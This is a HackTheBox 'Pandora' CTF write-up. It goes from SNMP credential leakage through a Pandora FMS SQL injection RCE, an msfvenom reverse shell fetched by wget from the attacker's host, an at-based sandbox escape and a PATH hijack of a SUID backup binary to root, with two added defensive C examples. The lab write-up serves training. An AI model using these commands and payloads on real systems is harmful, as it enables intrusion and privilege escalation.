HackTheBox – Pandora Write-up

Hi everyone! Today’s write-up is on Pandora, an easy GNU/Linux machine released on 10th January 2022. I won’t say the machine is easy if you are among those who build the SQL injection exploit from scratch. Someone actually built a PoC exploit for an old CVE recently for this HackTheBox challenge, so I leeched on it. This machine is good practice for the OSCP, especially since its foothold is similar to that of a retired OSCP exam machine. At the time of writing, it is not in TJ Null’s OSCP list yet. Maybe it will be added in the future.

To give you a brief overview, this machine requires enumerating the SNMP service, pivoting or port forwarding, finding an SQL injection vulnerability in an internal website, crafting your own SQL injection exploit or using an existing one created for this challenge, escaping the seteuid() restriction caused by the old version of libapache2-mpm-itk used by the Apache2 service on the machine, and finally escalating privileges through PATH hijacking of a SUID program. Let’s get started!

Nmap enumeration

kali@kali~$ IP=10.10.11.136
kali@kali~$ sudo nmap -n -p- $IP
...
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

kali@kali~$ sudo nmap -sC -sV -p22,80 $IP
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SNMP enumeration

kali@kali~$ snmp-check $IP
...
[*] Processes:

  Id                    Status                Name                  Path                  Parameters
...
845                   runnable              sh                    /bin/sh               -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'

Via the SNMP service, we are able to find credentials placed on the command line in one of the processes.
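As an added example (not part of the write-up), here is a small C checker for the weakness this finding exposes: any secret passed as a program argument is readable by every local user through /proc/<pid>/cmdline, and the SNMP process table republishes it to the network, which is how daniel’s password leaked. The flag list, the /proc walk and the sample command line (constructed from the process shown above) are my assumptions; "tar -p" style options will be reported as false positives.

```c
#include <ctype.h>
#include <dirent.h>
#include <stdio.h>
#include <string.h>
/* Option names whose next word (or "=value" suffix) normally carries a secret; assumed list. */
static const char *const SECRET_FLAGS[] = { "-p", "--password", "--passwd", "--token", NULL };
/* Scan one /proc/<pid>/cmdline buffer (len bytes, argv entries NUL-separated). Words are
 * split on NUL and on whitespace, so a secret inside a wrapper such as
 * sh -c "... host_check -u daniel -p ..." (the write-up's case) is still seen. Returns the
 * 0-based word index of the flag and copies the flag name, never the secret, into flag_out. */
int find_secret_arg(const char *buf, size_t len, char *flag_out, size_t outlen) {
    int idx = 0;
    for (size_t pos = 0; pos < len; idx++) {
        while (pos < len && (buf[pos] == '\0' || isspace((unsigned char)buf[pos]))) pos++;
        size_t start = pos;
        while (pos < len && buf[pos] != '\0' && !isspace((unsigned char)buf[pos])) pos++;
        size_t wlen = pos - start;
        if (wlen == 0) break;
        for (int i = 0; SECRET_FLAGS[i]; i++) {
            size_t flen = strlen(SECRET_FLAGS[i]);
            /* "-p secret" form (exact match) or "--password=secret" form */
            if (wlen >= flen && strncmp(buf + start, SECRET_FLAGS[i], flen) == 0 &&
                (wlen == flen || buf[start + flen] == '=')) {
                snprintf(flag_out, outlen, "%s", SECRET_FLAGS[i]);
                return idx;
            }
        }
    }
    return -1; /* nothing that looks like a secret-bearing option */
}
/* Walk /proc and report each process whose command line carries a secret flag; returns hit count, -1 if no /proc. */
int scan_proc(void) {
    DIR *d = opendir("/proc");
    int hits = 0;
    if (!d) return -1;
    for (struct dirent *e; (e = readdir(d)) != NULL;) {
        char path[288], cmd[4096], flag[32];
        if (!isdigit((unsigned char)e->d_name[0])) continue;
        snprintf(path, sizeof path, "/proc/%s/cmdline", e->d_name);
        FILE *f = fopen(path, "r");
        if (!f) continue;
        size_t n = fread(cmd, 1, sizeof cmd, f); /* very long command lines are truncated */
        fclose(f);
        if (find_secret_arg(cmd, n, flag, sizeof flag) < 0) continue;
        printf("pid %s passes a secret via %s on its command line\n", e->d_name, flag);
        hits++;
    }
    closedir(d);
    return hits;
}
int main(void) { return scan_proc() > 0 ? 1 : 0; }
```

Run it as any unprivileged user to see what a local attacker (or an SNMP walk with a read-only community) would see; it reports the option name but never prints the secret.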

SSH into the machine

As we have a credential, we can try to SSH into the machine since the SSH service is available.

kali@kali~$ ssh daniel@$IP
The authenticity of host '10.10.11.136 (10.10.11.136)' can't be established.
ECDSA key fingerprint is SHA256:9urFJN3aRYRRc9S5Zc+py/w4W6hmZ+WLg6CyrY+5MDI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.136' (ECDSA) to the list of known hosts.
daniel@10.10.11.136's password: HotelBabylon23
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 30 Jan 08:32:05 UTC 2022

  System load:  0.0               Processes:             444
  Usage of /:   72.3% of 4.87GB   Users logged in:       1
  Memory usage: 23%               IPv4 address for eth0: 10.10.11.136
  Swap usage:   0%

  => /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

daniel@pandora:~$ 

Access matt’s account

If we look at matt’s home directory, we can see the user flag file is there but is only readable by root or matt’s account.

daniel@pandora:~$ ls /home
daniel  matt
daniel@pandora:~$ ls -l /home/matt/
-rw-r----- 1 root matt 33 Jan 30 08:44 user.txt

Discovering localhost web service

Checking out the /var/www folder, I see another directory called “pandora”, while the “html” folder contains the uninteresting public-facing website whose service we already saw during the Nmap enumeration. This can be verified further by looking at the Apache configuration file.

daniel@pandora:~$ cd /var/www
daniel@pandora:/var/www$ ls
html  pandora
daniel@pandora:/var/www$ ls /etc/apache2/sites-available/
000-default.conf  default-ssl.conf  pandora.conf
daniel@pandora:/var/www$ cat /etc/apache2/sites-available/pandora.conf 
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>

We can see that it is only accessible via localhost. Besides that, the AssignUserID directive makes this virtual host run as the user matt.

Pivoting and accessing the internal website

We can use SSH local port forwarding to reach it.

kali@kali~$ ssh daniel@$IP -L 80:localhost:80
daniel@10.10.11.136's password: HotelBabylon23

This allows us to access the internal website.

The bottom of the website shows that it is running version v7.0NG.742_FIX_PERL2020. A quick Google search allows us to find vulnerabilities in this version here, as well as an unauthenticated SQL injection exploit here.

Remote Code Execution (RCE)

First, we need to download the exploit that someone recently wrote. Of course, you can choose to read the article and come up with your own exploit.

kali@kali~$ git clone https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated.git

Finally, we can run the exploit using Python3. We receive a “shell” which is actually just Remote Code Execution (RCE), not an interactive shell.

kali@kali~$ cd Pandora_v7.0NG.742_exploit_unauthenticated
kali@kali:Pandora_v7.0NG.742_exploit_unauthenticated$ python3 sqlpwn.py -t localhost
URL:  http://localhost/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : j8cgngqha6bemscvkv72iv2rfr
[+] Sending Payload 
[+] Respose : 200
[+] Pwned 🙂
[+] If you want manual Control : http://localhost/pandora_console/images/pwn.php?test=
CMD > whoami
matt

CMD > 

Understanding RCE Exploit (optional)

Following the OSCP way, we will need to obtain a reverse shell, as RCE alone is not allowed. Hence, we first need to find out which architecture the machine is using.

CMD > uname -a
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Since we now know it is a 64-bit machine, we can generate a reverse shell using msfvenom. Remember to change LHOST to your own machine’s IP address. We can host an HTTP server so that the machine can download the payload from our Kali box using wget. I’m not sure why port 22 doesn’t work. I guess iptables must restrict outbound traffic to only allow ports 80 and 443, probably.

kali@kali~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.49 LPORT=443 -f elf > shellx64.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
kali@kali~$ sudo python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ... 

Download it using the RCE “shell”. We must change its permissions before executing it later.

CMD > wget http://10.10.14.49:443/shellx64.elf -O /tmp/shellx64.elf
CMD > chmod 755 /tmp/shellx64.elf

CMD > ls -l /tmp
total 8
-rwxr-xr-x 1 matt matt 194 Jan 30 16:56 shellx64.elf
-rwxrwxrwx 1 matt matt  10 Jan 30 13:00 tar

Close the HTTP server and use Netcat to listen for the incoming reverse shell connection.

kali@kali~$ nc -lvnp 443
listening on [any] 443 ...

Finally, we execute the file using the “RCE” shell. Our Netcat listener should receive a shell. I then upgraded the shell to a TTY.

CMD > /tmp/shellx64.elf
kali@kali~$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.49] from (UNKNOWN) [10.10.11.136] 51122
python3 -c 'import pty; pty.spawn("/bin/bash")'
matt@pandora:/var/www/pandora/pandora_console/images$ 

Obtaining user flag

matt@pandora:/var/www/pandora/pandora_console/images$ cd /home/matt
matt@pandora:/home/matt$ ls
user.txt
matt@pandora:/home/matt$ cat user.txt
36f**************************

Privilege escalation

SUID

When searching for SUID programs, I noticed an interesting SUID program related to the website’s name.

matt@pandora:/home/matt$ find / -perm /4000 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1

When I tried to run the file, I was greeted with an error message.

matt@pandora:/home/matt$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!

When I dumped the file’s contents, I noticed a string containing the full command that the program runs.

matt@pandora:/home/matt$ hexdump -C /usr/bin/pandora_backup
...
00002000  01 00 02 00 00 00 00 00  50 61 6e 64 6f 72 61 46  |........PandoraF|
00002010  4d 53 20 42 61 63 6b 75  70 20 55 74 69 6c 69 74  |MS Backup Utilit|
00002020  79 00 00 00 00 00 00 00  4e 6f 77 20 61 74 74 65  |y.......Now atte|
00002030  6d 70 74 69 6e 67 20 74  6f 20 62 61 63 6b 75 70  |mpting to backup|
00002040  20 50 61 6e 64 6f 72 61  46 4d 53 20 63 6c 69 65  | PandoraFMS clie|
00002050  6e 74 00 00 00 00 00 00  74 61 72 20 2d 63 76 66  |nt......tar -cvf|
00002060  20 2f 72 6f 6f 74 2f 2e  62 61 63 6b 75 70 2f 70  | /root/.backup/p|
00002070  61 6e 64 6f 72 61 2d 62  61 63 6b 75 70 2e 74 61  |andora-backup.ta|
00002080  72 2e 67 7a 20 2f 76 61  72 2f 77 77 77 2f 70 61  |r.gz /var/www/pa|
00002090  6e 64 6f 72 61 2f 70 61  6e 64 6f 72 61 5f 63 6f  |ndora/pandora_co|
000020a0  6e 73 6f 6c 65 2f 2a 00  42 61 63 6b 75 70 20 66  |nsole/*.Backup f|
000020b0  61 69 6c 65 64 21 0a 43  68 65 63 6b 20 79 6f 75  |ailed!.Check you|
000020c0  72 20 70 65 72 6d 69 73  73 69 6f 6e 73 21 00 42  |r permissions!.B|
000020d0  61 63 6b 75 70 20 73 75  63 63 65 73 73 66 75 6c  |ackup successful|
000020e0  21 00 54 65 72 6d 69 6e  61 74 69 6e 67 20 70 72  |!.Terminating pr|
000020f0  6f 67 72 61 6d 21 00 00  01 1b 03 3b 3c 00 00 00  |ogram!.....;<...|
00002100  06 00 00 00 28 ef ff ff  88 00 00 00 88 ef ff ff  |....(...........|

Based on the command, tar is being executed without its full path, so the program relies on a PATH lookup to find it. As a result, we can perform a PATH hijack.
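As an added example (not the machine’s binary, whose source is not on the page), here is the defect in C beside a hardened form: a privileged helper that runs a bare tar through a shell lets the caller’s PATH decide which tar runs as root, whereas exec of an absolute path with a fixed environment does not. The trusted-directory allowlist, the -C style invocation and the /tmp archive path are my assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#define TAR_PATH "/bin/tar"
/* Directories a root-level helper may search; anything else is rejected (assumed allowlist). */
static const char *const TRUSTED_DIRS[] = { "/usr/sbin", "/usr/bin", "/sbin", "/bin", NULL };
/* Return 1 if every PATH entry is in TRUSTED_DIRS, else 0. Empty entries (leading
 * or doubled ':') and relative ones like "." are rejected too: each lets the
 * invoking user decide which "tar" a privileged program ends up running. */
int path_is_trusted(const char *path) {
    const char *p = path;
    if (!p) return 0;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t n = end ? (size_t)(end - p) : strlen(p);
        int ok = 0;
        for (int i = 0; TRUSTED_DIRS[i]; i++)
            if (n == strlen(TRUSTED_DIRS[i]) && strncmp(p, TRUSTED_DIRS[i], n) == 0) ok = 1;
        if (!ok) return 0;
        if (!end) return 1;
        p = end + 1;
    }
}
/* VULNERABLE pattern implied by the hexdump (the wildcard means a shell is involved):
 *   system("tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*");
 * HARDENED: absolute program path, no shell, and a fixed environment, so the invoking
 * user's PATH, IFS and LD_* never apply. Returns tar's exit status, -1 on fork/wait error. */
int run_backup(const char *archive, const char *srcdir) {
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* "-C srcdir ." archives the directory contents without any shell globbing */
        char *const argv[] = { TAR_PATH, "-czf", (char *)archive, "-C", (char *)srcdir, ".", NULL };
        execve(TAR_PATH, argv, clean_env);
        _exit(127); /* exec failed: never fall back to a shell */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
int main(void) { /* refuses to run under a PATH such as /home/daniel/spoiler:/usr/bin */
    if (!path_is_trusted(getenv("PATH"))) { fputs("untrusted PATH, aborting\n", stderr); return 1; }
    return run_backup("/tmp/pandora-example.tgz", "/var/www/pandora/pandora_console") == 0 ? 0 : 1;
}
```

The PATH check is a defence-in-depth belt for code that must still call system(); the real fix is run_backup’s execve with a fixed environment, which makes the caller’s PATH irrelevant.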

Fixing seteuid()

While attempting the PATH hijack, I stumbled across an issue where /usr/bin/pandora_backup was not running as root. If we run “sudo -l” we will realize there is an error.

matt@pandora:/var/www/pandora/pandora_console/DEBIAN$ sudo -l
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin

A quick Google search shows that an old version of the libapache2-mpm-itk package breaks syscalls such as seteuid() for processes spawned under it. You can read about it in this StackOverflow post and the official bug report. Looking at the documentation installed for the machine’s Apache2 module, we can see it is using a late-2013 mpm-itk package that has this bug.

matt@pandora:/home/matt$ find / -name libapache2-mpm-itk 2>/dev/null
/usr/share/doc/libapache2-mpm-itk
matt@pandora:/home/matt$ ls /usr/share/doc/libapache2-mpm-itk
README.Debian  changelog.Debian.gz  copyright
matt@pandora:/home/matt$ cat /usr/share/doc/libapache2-mpm-itk/README*
mpm-itk for Debian
------------------

Note that mpm-itk has gone from being a true MPM to just being a module
that hooks into prefork. You can safely remove the old apache2-mpm-itk
package if you still have it installed.

 -- Steinar H. Gunderson <sesse@debian.org>  Thu, 07 Nov 2013 20:16:19 +0100

Thus, we can break out of the restricted environment using the at command, since the job is executed by the atd daemon, outside the restricted Apache process tree. I copied and pasted the full command with its arguments from GTFOBins here.

matt@pandora:/home/matt$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
warning: commands will be executed using /bin/sh
job 4 at Mon Jan 31 03:13:00 2022
/bin/sh: 0: can't access tty; job control turned off
$ 

Path hijacking

In the SSH session as daniel, use nano to create a file in daniel’s home directory. Somehow my reverse shell had a hard time creating the exploit file, so using the SSH session is easier.

daniel@pandora:~$ mkdir spoiler
daniel@pandora:~$ cd spoiler/
daniel@pandora:~/spoiler$ nano tar

In the tar file, I copy the bash binary and make it SUID so that I don’t need another reverse shell, which is troublesome.

#!/bin/bash

cp /bin/bash /home/matt/bash
chmod u+s /home/matt/bash

Once the file is saved, change its permissions to allow everyone to execute it.

daniel@pandora:~/spoiler$ chmod 777 tar

Finally, in matt’s shell, prepend daniel’s spoiler directory to the PATH environment variable before executing the SUID program.

$ export PATH="/home/daniel/spoiler:$PATH"
$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
Backup successful!
Terminating program!
$ ls -l
total 1160
-rwsr-xr-x 1 root matt 1183448 Jan 31 03:15 bash
-rw-r----- 1 root matt      33 Jan 30 08:44 user.txt

Spawn root shell

Since the copied bash is now owned by root with the SUID bit set, we can spawn it as root (the -p flag keeps the effective UID instead of dropping it).

$ ./bash -p
bash: cannot set terminal process group (833): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0# id
uid=1000(matt) gid=1000(matt) euid=0(root) groups=1000(matt)
bash-5.0# 

Obtaining root flag

bash-5.0# cd /root
bash-5.0# ls    
root.txt
bash-5.0# cat root.txt
d94****************************

I hope this write-up has been helpful to you. Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
